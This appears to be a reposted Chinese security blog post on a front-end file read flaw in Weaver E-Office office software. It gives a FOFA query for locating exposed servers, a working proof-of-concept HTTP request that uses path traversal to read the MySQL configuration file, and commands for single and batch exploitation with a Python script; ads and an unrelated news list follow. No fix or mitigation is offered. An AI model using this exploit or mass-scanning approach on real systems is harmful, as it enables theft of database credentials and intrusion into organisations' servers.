泛微E-Office文件读取漏洞
泛微E-Office是一款企业级的全流程办公自动化软件,它包括协同办公、文档管理、知识管理、工作流管理等多个模块,涵盖了企业日常工作中的各个环节。泛微E-Office能够帮助企业实现全流程数字化、自动化,提高工作效率和管理质量,降低管理成本,为企业提供全面、高效、便捷的办公服务。
泛微E-Office前台文件读取漏洞。
二、网络空间搜索引擎查询
fofa查询
app=“泛微-EOffice”
三、漏洞复现
poc
GET /iweboffice/officeserver2.php?OPTION=LOADTEMPLATE&COMMAND=INSERTFILE&TEMPLATE=../../bin/mysql_config.ini HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Length: 0
浏览器直接访问返回如下
四、批量检测与利用
单个检测与利用
python .\E-OfficeReadfile.py -u http://ip:port
批量检测
python .\E-OfficeReadfile.py -f filename
关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/
萌萌tang
关注网络尖刀微信公众号随时掌握互联网精彩
- 1 去“三好”邻邦家做客 7904094
- 2 央行1万亿元大红包对普通人影响多大 7808674
- 3 “始祖鸟平替”要IPO了 7713015
- 4 一文梳理这场国新办发布会 7615978
- 5 两国禁止武契奇乘机飞越领空 7522842
- 6 三德子赵亮卖土鸡商标为“德子土” 7425767
- 7 巴总理激动拍桌:我们有实力有核力量 7330846
- 8 牛弹琴:特朗普当场被怼了 7234359
- 9 印巴冲突是否会进一步升级 7139370
- 10 远隔万里的共同纪念 7046357
